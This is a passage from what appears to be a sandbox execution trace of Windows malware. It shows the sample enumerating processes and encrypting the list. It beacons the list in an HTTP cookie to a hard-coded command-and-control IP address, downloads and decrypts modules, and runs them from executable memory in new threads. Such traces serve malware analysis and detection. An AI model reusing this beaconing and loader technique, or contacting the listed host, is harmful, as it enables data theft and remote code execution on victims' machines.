dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.394] GetCurrentProcessId () returned 0x6cc [0229.394] GetCurrentProcessId () returned 0x6cc [0229.394] lstrcpyW (in: lpString1=0x50616c, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0229.395] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.395] GetCurrentProcessId () returned 0x6cc [0229.395] GetCurrentProcessId () returned 0x6cc [0229.395] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.395] GetCurrentProcessId () returned 0x6cc [0229.395] GetCurrentProcessId () returned 0x6cc [0229.395] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0229.396] GetCurrentProcessId () returned 0x6cc [0229.396] GetCurrentProcessId () returned 0x6cc [0229.396] lstrcpyW (in: lpString1=0x506384, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0229.396] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.396] GetCurrentProcessId () returned 0x6cc [0229.396] GetCurrentProcessId () returned 0x6cc [0229.396] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0229.397] GetCurrentProcessId () returned 0x6cc [0229.397] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 0 [0229.397] CloseHandle (hObject=0x1fc) returned 1 [0229.397] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0229.397] lstrlenW (lpString="spoolsv.exe") returned 11 [0229.397] lstrlenW (lpString="taskhostw.exe") returned 13 [0229.397] lstrlenW (lpString="dwm.exe") returned 7 [0229.397] lstrlenW (lpString="LogonUI.exe") returned 11 [0229.397] lstrlenW (lpString="svchost.exe") returned 11 [0229.397] lstrlenW (lpString="lsass.exe") returned 9 [0229.397] lstrlenW (lpString="services.exe") returned 12 [0229.397] lstrlenW (lpString="winlogon.exe") returned 12 [0229.397] lstrlenW (lpString="wininit.exe") returned 11 [0229.397] lstrlenW (lpString="csrss.exe") returned 9 [0229.397] lstrlenW (lpString="smss.exe") returned 8 [0229.397] lstrcpyW (in: lpString1=0x506598, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0229.397] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0229.397] lstrcpyW (in: lpString1=0x5065c2, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0229.397] lstrlenW (lpString="spoolsv.exe") returned 11 [0229.398] lstrcpyW (in: lpString1=0x5065da, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0229.398] lstrlenW (lpString="taskhostw.exe") returned 13 [0229.398] lstrcpyW (in: lpString1=0x5065f6, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0229.398] lstrlenW (lpString="dwm.exe") returned 7 [0229.398] lstrcpyW (in: lpString1=0x506606, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0229.398] lstrlenW (lpString="LogonUI.exe") returned 11 [0229.398] lstrcpyW (in: lpString1=0x50661e, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0229.398] lstrlenW (lpString="svchost.exe") returned 11 [0229.398] lstrcpyW (in: lpString1=0x506636, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0229.398] lstrlenW (lpString="lsass.exe") returned 9 [0229.398] lstrcpyW (in: lpString1=0x50664a, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0229.398] lstrlenW (lpString="services.exe") returned 12 [0229.398] lstrcpyW (in: lpString1=0x506664, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0229.398] lstrlenW (lpString="winlogon.exe") returned 12 [0229.398] lstrcpyW (in: lpString1=0x50667e, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0229.398] lstrlenW (lpString="wininit.exe") returned 11 [0229.398] lstrcpyW (in: lpString1=0x506696, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0229.398] lstrlenW (lpString="csrss.exe") returned 9 [0229.398] lstrcpyW (in: lpString1=0x5066aa, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0229.398] lstrlenW (lpString="smss.exe") returned 8 [0229.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe,spoolsv.exe,taskhostw.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", cchWideChar=146, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 146 [0229.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe,spoolsv.exe,taskhostw.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", cchWideChar=146, lpMultiByteStr=0x5066c8, cbMultiByte=146, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe,spoolsv.exe,taskhostw.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", lpUsedDefaultChar=0x0) returned 146 [0229.403] CryptDuplicateHash (in: hHash=0x4fd5a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x19faec | out: phHash=0x19faec) returned 1 [0229.403] CryptEncrypt (in: hKey=0x4fd7e8, hHash=0x4fd6a8, Final=1, dwFlags=0x0, pbData=0x504cec*, pdwDataLen=0x19fad4*=0xa0, dwBufLen=0xb0 | out: pbData=0x504cec*, pdwDataLen=0x19fad4*=0xb0) returned 1 [0229.416] CryptExportKey (in: hKey=0x4fd7e8, hExpKey=0x4fdaa8, dwBlobType=0x1, dwFlags=0x40, pbData=0x19fa48, pdwDataLen=0x19fab4 | out: pbData=0x19fa48*, pdwDataLen=0x19fab4*=0x6c) returned 1 [0229.416] CryptGetHashParam (in: hHash=0x4fd6a8, dwParam=0x2, pbData=0x504cd8, pdwDataLen=0x19fad0, dwFlags=0x0 | out: pbData=0x504cd8, pdwDataLen=0x19fad0) returned 1 [0229.416] CryptDestroyHash (hHash=0x4fd6a8) returned 1 [0229.416] _snwprintf (in: _Dest=0x19fb00, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="41.57.104.182") returned 13 [0229.416] GetTickCount () returned 0xe399 [0229.416] _snwprintf (in: _Dest=0x504da8, _Count=0x1c8, _Format="Cookie: %u=" | out: _Dest="Cookie: 36140=") returned 14 [0229.417] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x19f6ac, cbSize=0x19faac | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x19faac) returned 0x0 [0235.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0235.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x510930, cchWideChar=151 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 151 [0235.048] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0236.793] InternetConnectW (hInternet=0xcc0004, lpszServerName="41.57.104.182", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0236.800] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0236.830] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Cookie: 36140=YKawoR62LO8t/kKZ+aENeBBnqAKc01IGxzhmtpkzmkktTaToHMs7o4ZzuSeGdCDClDYRUlxRY2JmyUV9VjS3l31M58pgjcXrtuZvxQ0MQTtPdIoZn8RXVDQnUiTYgW6ZK20xT4QXaWXvgKm9drIyNHutQgz3I0r/aIvF4grFKpvEpoy4/1mp5QYtPLyFV/GWzv5gfE+e49yVXoZwudbrtGWOGIW2H5iF/H3fMaZo2t9yoAgv48sbDkTilAkkof6GyDJQ6QEojXai4GnFp9hBbCbNM5yrMc/6p5zVU4K3PSZPG8aZOTxo4jBeI9d64wIDnrss4ajo1mr/SjgzYjST6ntDfxAexFfJ1V6PYFnb5NMxZPKtTsx8kQOo2e3a7rOwTicnMw==", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0238.741] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x19faa8, lpdwBufferLength=0x19faac, lpdwIndex=0x0 | out: lpBuffer=0x19faa8*, lpdwBufferLength=0x19faac*=0x4, lpdwIndex=0x0) returned 1 [0238.741] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x19faac, lpdwBufferLength=0x19faa8, lpdwIndex=0x0 | out: lpBuffer=0x19faac*, lpdwBufferLength=0x19faa8*=0x4, lpdwIndex=0x0) returned 1 [0238.744] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11cd020, dwNumberOfBytesToRead=0xe35e4, lpdwNumberOfBytesRead=0x19faa8 | out: lpBuffer=0x11cd020*, lpdwNumberOfBytesRead=0x19faa8*=0xe35e4) returned 1 [0248.601] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0248.601] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0248.601] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0248.603] CryptDuplicateHash (in: hHash=0x4fd5a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x19fadc | out: phHash=0x19fadc) returned 1 [0248.606] CryptDecrypt (in: hKey=0x4fd7e8, hHash=0x512f68, Final=1, dwFlags=0x0, pbData=0x140a020, pdwDataLen=0x19fba4 | out: pbData=0x140a020, pdwDataLen=0x19fba4) returned 1 [0248.609] CryptVerifySignatureW (hHash=0x512f68, pbSignature=0x11cd020, dwSigLen=0x60, hPubKey=0x4fdaa8, szDescription=0x0, dwFlags=0x0) returned 1 [0248.609] CryptDestroyHash (hHash=0x512f68) returned 1 [0248.641] VirtualAlloc (lpAddress=0x0, dwSize=0x6b000, flAllocationType=0x3000, flProtect=0x40) returned 0x11c0000 [0248.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x511548, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0248.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x1270000 [0248.647] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x511348, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0248.648] VirtualAlloc (lpAddress=0x0, dwSize=0x4a000, flAllocationType=0x3000, flProtect=0x40) returned 0x1440000 [0248.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x511568, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0248.651] VirtualAlloc (lpAddress=0x0, dwSize=0x7000, flAllocationType=0x3000, flProtect=0x40) returned 0xb10000 [0248.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x511288, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0248.652] VirtualAlloc (lpAddress=0x0, dwSize=0x3e000, flAllocationType=0x3000, flProtect=0x40) returned 0x1aa0000 [0248.654] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x765f0000 [0248.654] GetProcAddress (hModule=0x765f0000, lpProcName="GetQueuedCompletionStatus") returned 0x76608c30 [0248.654] GetProcAddress (hModule=0x765f0000, lpProcName="WaitForSingleObject") returned 0x76616110 [0248.654] GetProcAddress (hModule=0x765f0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76616020 [0248.654] GetProcAddress (hModule=0x765f0000, lpProcName="LeaveCriticalSection") returned 0x77555e00 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="ReleaseSemaphore") returned 0x766160a0 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="EnterCriticalSection") returned 0x77555e80 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSemaphoreW") returned 0x76616000 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="PostQueuedCompletionStatus") returned 0x76615750 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="CreateIoCompletionPort") returned 0x76615770 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="DeleteCriticalSection") returned 0x77569920 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="TryEnterCriticalSection") returned 0x77569070 [0248.655] GetProcAddress (hModule=0x765f0000, lpProcName="SetEvent") returned 0x766160c0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="GetTickCount") returned 0x766157f0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="ResetEvent") returned 0x766160b0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="CreateEventW") returned 0x76615fa0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentThreadId") returned 0x76601b90 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="GetSystemDirectoryW") returned 0x76609a90 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryW") returned 0x7660a0b0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="LocalFree") returned 0x766087c0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="QueryPerformanceCounter") returned 0x76602dc0 [0248.656] GetProcAddress (hModule=0x765f0000, lpProcName="GetSystemTimeAsFileTime") returned 0x76602b90 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="Sleep") returned 0x766077b0 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="GetProcAddress") returned 0x76607940 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="QueryPerformanceFrequency") returned 0x76608b50 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="GetLastError") returned 0x76602db0 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="CloseHandle") returned 0x76615f20 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="HeapSize") returned 0x77564f40 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="WriteConsoleW") returned 0x76616920 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="FlushFileBuffers") returned 0x766162a0 [0248.657] GetProcAddress (hModule=0x765f0000, lpProcName="SetEnvironmentVariableA") returned 0x76632560 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="LCMapStringW") returned 0x76609a40 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="CompareStringW") returned 0x76612230 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="GetStringTypeW") returned 0x766079b0 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryExW") returned 0x76607920 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="OutputDebugStringW") returned 0x76631c30 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="RtlUnwind") returned 0x76609a80 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="FreeEnvironmentStringsW") returned 0x7660a0f0 [0248.658] GetProcAddress (hModule=0x765f0000, lpProcName="GetEnvironmentStringsW") returned 0x7660a3b0 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleFileNameA") returned 0x7660a040 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetConsoleCP") returned 0x76616860 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetCPInfo") returned 0x76609fc0 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetOEMCP") returned 0x7660fd10 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetACP") returned 0x76608770 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="IsValidCodePage") returned 0x7660a090 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="CreateFileW") returned 0x76616180 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="WideCharToMultiByte") returned 0x766075a0 [0248.659] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleHandleExW") returned 0x76609fa0 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="UnmapViewOfFile") returned 0x766094b0 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="SetFilePointerEx") returned 0x76616540 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="GetFileType") returned 0x76616390 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="SetStdHandle") returned 0x766326a0 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="HeapFree") returned 0x766025e0 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="HeapAlloc") returned 0x7754da90 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="HeapReAlloc") returned 0x7754bae0 [0248.660] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThread") returned 0x76609700 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="ExitThread") returned 0x77572570 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="ResumeThread") returned 0x7660a280 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentProcessId") returned 0x76601d90 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="ReadFile") returned 0x766164a0 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="MultiByteToWideChar") returned 0x76602d60 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="GetConsoleMode") returned 0x76616870 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="ReadConsoleW") returned 0x766168e0 [0248.661] GetProcAddress (hModule=0x765f0000, lpProcName="EncodePointer") returned 0x7756f190 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="DecodePointer") returned 0x7756a200 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="SetConsoleCtrlHandler") returned 0x766168f0 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="GetCommandLineA") returned 0x7660a3c0 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="IsDebuggerPresent") returned 0x7660a790 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="IsProcessorFeaturePresent") returned 0x76609680 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="GetStdHandle") returned 0x7660a060 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="GetStartupInfoW") returned 0x7660a080 [0248.662] GetProcAddress (hModule=0x765f0000, lpProcName="SetLastError") returned 0x76602af0 [0248.663] GetProcAddress (hModule=0x765f0000, lpProcName="UnhandledExceptionFilter") returned 0x766328e0 [0248.663] GetProcAddress (hModule=0x765f0000, lpProcName="SetUnhandledExceptionFilter") returned 0x7660a2c0 [0248.663] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentProcess") returned 0x76602da0 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="TerminateProcess") returned 0x7660fbc0 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="TlsAlloc") returned 0x76609a70 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="TlsGetValue") returned 0x76601ba0 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="TlsSetValue") returned 0x76601da0 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="TlsFree") returned 0x76609930 [0248.677] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleHandleW") returned 0x76609660 [0248.678] GetProcAddress (hModule=0x765f0000, lpProcName="WriteFile") returned 0x76616590 [0248.678] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleFileNameW") returned 0x76609560 [0248.678] GetProcAddress (hModule=0x765f0000, lpProcName="GetProcessHeap") returned 0x76607910 [0248.678] GetProcAddress (hModule=0x765f0000, lpProcName="ExitProcess") returned 0x766174f0 [0248.678] GetProcAddress (hModule=0x765f0000, lpProcName="RaiseException") returned 0x76609ec0 [0248.678] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x76a40000 [0248.678] GetProcAddress (hModule=0x76a40000, lpProcName="getnameinfo") returned 0x76a516a0 [0248.678] GetProcAddress (hModule=0x76a40000, lpProcName=0xb) returned 0x76a52e90 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x14) returned 0x76a515a0 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x12) returned 0x76a548e0 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x4) returned 0x76a533a0 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x8) returned 0x76a53670 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName="getaddrinfo") returned 0x76a452b0 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x6) returned 0x76a4e030 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName="freeaddrinfo") returned 0x76a44b00 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0x7) returned 0x76a51180 [0248.679] GetProcAddress (hModule=0x76a40000, lpProcName=0xd) returned 0x76a53f40 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x1) returned 0x76a54030 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName="WSAIoctl") returned 0x76a4dca0 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x17) returned 0x76a49780 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x10) returned 0x76a4cff0 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x13) returned 0x76a4ce20 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x5) returned 0x76a512c0 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x15) returned 0x76a49560 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName=0x2) returned 0x76a4e0f0 [0248.680] GetProcAddress (hModule=0x76a40000, lpProcName="WSAGetOverlappedResult") returned 0x76a4e1b0 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName=0x3) returned 0x76a49ba0 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName=0x70) returned 0x76a53ff0 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName=0xa) returned 0x76a4d860 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName="WSARecv") returned 0x76a4d6c0 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName="WSASend") returned 0x76a4d530 [0248.681] GetProcAddress (hModule=0x76a40000, lpProcName=0x6f) returned 0x76a538d0 [0248.681] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x73e60000 [0248.681] GetProcAddress (hModule=0x73e60000, lpProcName="GetBestRoute") returned 0x73e7f0a0 [0248.682] GetProcAddress (hModule=0x73e60000, lpProcName="GetIpAddrTable") returned 0x73e7f240 [0248.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x511308, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x36c [0248.682] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x3000, flProtect=0x40) returned 0xb20000 [0248.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x5113c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x370 [0248.683] VirtualAlloc (lpAddress=0x0, dwSize=0x4f000, flAllocationType=0x3000, flProtect=0x40) returned 0x1dc0000 [0248.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410200, lpParameter=0x5273e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x374 [0248.692] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0248.692] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0248.692] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0248.692] DispatchMessageW (lpMsg=0x19ff2c) returned 0xd15bb [0248.692] GetTickCount () returned 0x12edb [0248.692] GetTickCount () returned 0x12edb [0248.692] GetTickCount () returned 0x12edb [0248.692] lstrlenA (lpString="LHNIWSJ_D2CA4DEF") returned 16 [0248.692] RtlGetVersion (in: lpVersionInformation=0x19fc38 | out: lpVersionInformation=0x19fc38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0248.692] GetNativeSystemInfo (in: lpSystemInfo=0x19fc14 | out: lpSystemInfo=0x19fc14*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0248.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0248.694] Process32FirstW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.695] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.695] GetCurrentProcessId () returned 0x6cc [0248.695] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.695] GetCurrentProcessId () returned 0x6cc [0248.695] GetCurrentProcessId () returned 0x6cc [0248.696] lstrcpyW (in: lpString1=0x5274dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0248.696] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, 